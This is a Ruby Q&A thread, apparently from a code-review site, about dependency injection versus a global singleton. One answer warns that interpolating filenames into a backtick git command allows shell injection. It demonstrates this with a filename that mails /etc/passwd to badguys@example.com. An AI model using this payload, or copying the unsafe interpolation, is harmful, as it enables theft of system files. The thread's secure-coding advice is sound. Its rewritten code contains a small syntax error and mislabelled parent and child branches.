# Avoid passing variable from class to class

Tags: ruby

For context, I have a `SourceControlSystem` factory class that detects if a user is using Git, SVN, or another source control system and returns an object to interact with that source control system. The implementation is [here](https://github.com/whitesmith/rubycritic/blob/master/lib/rubycritic/source_control_systems/source_control_system.rb), but I don't think it's very relevant.

So, at the start of my library, I have this single line:

```
@source_control_system = SourceControlSystem.create
```

Now the problem is that some classes depend on this variable. I have a `Churn` class that needs this variable, but a `Churn` class instance is only created inside of a `Turbulence` class.

So I'm doing stuff like the following:

First, I pass `@source_control_system` to a `Turbulence` instance:

```
Turbulence.new(@source_control_system).data
```

And then inside the `Turbulence` class:

```
class Turbulence
  def initialize(source_control_system)
    @source_control_system = source_control_system
  end

  ...

  # Turbulence doesn't need @source_control_system
  # It merely passes it to Churn
  def churn
    @churn ||= Churn.new(@paths, @source_control_system).churn
  end
end
```

And then I finally pass it to to the `Churn` class:

```
class Churn
  def initialize(paths, source_control_system)
    @paths = paths
    @source_control_system = source_control_system
  end

  # do stuff with @source_control_system here
end
```

Do you consider this to be a problem or not?

I don't think creating that variable is that expensive so I could just call `SourceControlSystem.create` twice, once inside the `Churn` class and another outside of it. Do you see any harm in that? I could do that but it seems... odd.

Or should `SourceControlSystem` be some sort of global singleton object? That way, every class that needed it could instantly access it and call methods on it. You know, like the `Math` module. That way, I wouldn't have to keep passing it as an argument to a bunch of classes.

How would you do it?

Comment: I don't see the two places where you call `SourceControlSystem.create`?

Comment: Exactly, I don't. I just call it once, and pass that instance around through a bunch of classes. One possible solution would be to call  `SourceControlSystem.create` twice, but that didn't seem right to me.

Answer (score 2, accepted):

> Do you consider this to be a problem or not?

This is good design! You make the state and the dependencies of your classes explicit. Imagine another developer needs to work with your code. He immediatly sees "oh, this `turbulence` needs access to the `SourceControlSystem` and it is given the access by this argument here!"

Just note, that if you create multiple instances of `Turbulence` you don't always have to use `Turbulence.new(@source_control_system)` but you can either create a factory for specific turbulences or curry/partial apply the new (although I don't know if thats possible in ruby).

Comment: But the thing is, `Turbulence` itself does not need access to `SourceControlSystem`. Only `Churn`. The problem is that `Churn` is only created inside `Turbulence`. So I have to pass `SourceControlSystem` to `Turbulence` so it can pass it in turn to `Churn`.

Comment: But as it is managing it's `churn` it needs to create the `churn`. And to do so it must pass over the SCS. If you want to be even more clean you can pass the `churn` to the `turbulence` in the moment it is created. If you can't because the `turbulence` has to do something before we know the (correct) `churn` to pass it to the `turbulence` then you are violating the SRP and you should consider splitting the `Turbulence` class. However at some point there must be a managing class knowing what a churn is and how to create it. You can't get around it unless you make the state/parameters implicit.

Comment: Yeah, I thought about injecting `Churn` like you are suggesting. However, if I did that, then `Turbulence` would mostly be an empty class. And like you said, then `Churn` would have to be instantiated somewhere else. Some other class would have to know how to instantiate `Churn` so the problem would still persist.

Comment: So, in your opinion having a globally accessible object like SourceControlSystem is a bad design choice? That way I wouldn't have to pass it around through several classes. But that would hide the fact that `Churn` needs a SourceControlSystem.

Comment: Yes that is a bad design choice. It makes it much harder to reason about what a code is doing in doing in the very moment it is executed. It takes more effort to unittest it. It is less extensible, more difficult to maintain. I think you can find the drawbacks yourself. Passing it through several classes is fine. What problems do you see with that approach?

Comment: I find it cumbersome to pass data to some class that doesn't use that data for anything. It bugs me that `Turbulence` holds an instance variable for naught. I guess that the lifetime of a `Turbulence` object isn't that long, after calculating some data, the object is discarded. So I guess that unused instance variable doesn't last long. I'm still a novice at designing a program architecture, so I guess this which you find ok, shouldn't bug me at all :)

Comment: Sure, it does not use the `sourceControlSystem`. But having a required parameter `SourceControlSystem` does _not_ mean that the argument will directly be used. It rather means that the class/method is somehow _dependent_ on it. Sure, you can use a global variable or global singleton but this will just shift the dependency from an explicit parameter to the implicit global context. But if you don't like passing something to object that does not use it directly, no problem: just create the `churn` before the `turbolence` and pass it to the `turbolence` with the `SourceControlSystem` already in it

Comment: You cleared my mind regarding this code. I feel a little more confident now. Thanks!

Answer (score 3):

I need to comment on an aspect of the code that you did not ask about, which is [the way you invoke `git` as an external command](https://github.com/whitesmith/rubycritic/blob/7bbeda7fd28a76e6be56fff9571c8c5fe8790dab/lib/rubycritic/source_control_systems/git.rb#L30):

```
def revisions_count(file)
  `git log --follow --format=oneline #{file}`.count("\n")
end
```

**That filename interpolation is dangerous.**  You might get a "benign" failure if, for example, the filename contains a space.  In the worst case, the filename might contain a shell metacharacter, such as a semicolon, which could lead to the execution of arbitrary code.

> Here's an example of it being exploited on a Unix system.  At the shell prompt, create the malicious file:
>
> ```sh
> touch '; mail badguys@example.com < `printf "\057etc\057passwd"`'
> ```
>
> (I've used `printf` to work around the restriction that Unix filenames can contain any character *except* <kbd>/</kbd> and <kbd>NUL</kbd>.)
>
> Then, run the following Ruby code:
>
> ```
> revisions_count(*Dir.glob('*badguys*'))
> ```

Backticks are a handy technique for throwaway code, but aren't really suitable for production-quality code.  Your `Git` class should have one common codepath for executing `git` securely.

```
class Git
  class GitError < Exception ; end

  # Executes git with the given command-line arguments.
  # If a block is given, then the block is called with git's output as an IO object.
  # Raises Git::GitError if the command did not exit with a successful status.
  # Otherwise, returns the result of the block (if there is a block) or
  # the Process::Status object (if no block is given).
  def self.git(*args)
    IO::popen(['git', *args], 'w+') do |pipe|
      begin
        return block_given? ? (yield pipe) : $?
      ensure
        begin
          pipe.read  # Drain the pipe to avoid SIGPIPE
        end
        pipe.close unless pipe.closed?
        raise GitError.new unless $?.success?
      end
    end
  end

  def revisions_count(file)
    git('log', '--follow', '--format=oneline', file) do
     |pipe| pipe.to_a.length
    do
  end
end
```

If you need compatibility with Ruby 1.8, whose `IO::popen` does not take an array…

```
  def self.git(*args)
    IO::popen('-', 'w+') do |pipe|
      if pipe.nil?
        # Parent
        Kernel.exec('git', *args)
      else
        # Child
        begin
          return block_given? ? (yield pipe) : $?
        ensure
          begin
            pipe.read  # Drain the pipe to avoid SIGPIPE
          end
          pipe.close unless pipe.closed?
          raise GitError.new unless $?.success?
        end
      end
    end
  end
```

Comment: Damn. Say you want about Donald Rumsfeld, but he's right about the unknown unknowns. Things we don't know we don't know are downright scary. Thanks for looking into this code even though it wasn't the matter at hand. I wish I could give you more than 10 points.

Comment: In my defense, I created that `Git` class based on [this code](https://github.com/danmayer/churn/blob/master/lib/churn/scm/git_analyzer.rb) and [this other code](https://github.com/chad/turbulence/blob/master/lib/turbulence/scm/git.rb). I guess the difference is that they control the interpolated values and I don't. Btw, how would you name a file so it would print "hello world" using my code? And where can I read more about this? Thanks again.

Answer (score 1):

Why not create a static property on the `Churn` class for the source control object:

```
class Churn
  cattr_accessor :source_control
  ...
end
```

Then somewhere during the application init process:

```
Churn.source_control = SourceControlSystem.create
```

Edit: Setting the source control object at application init would also allow you to throw in the source control info into a YAML file, if you haven't already done that.

Comment: `cattr_accessor` is a Rails extension. But point taken.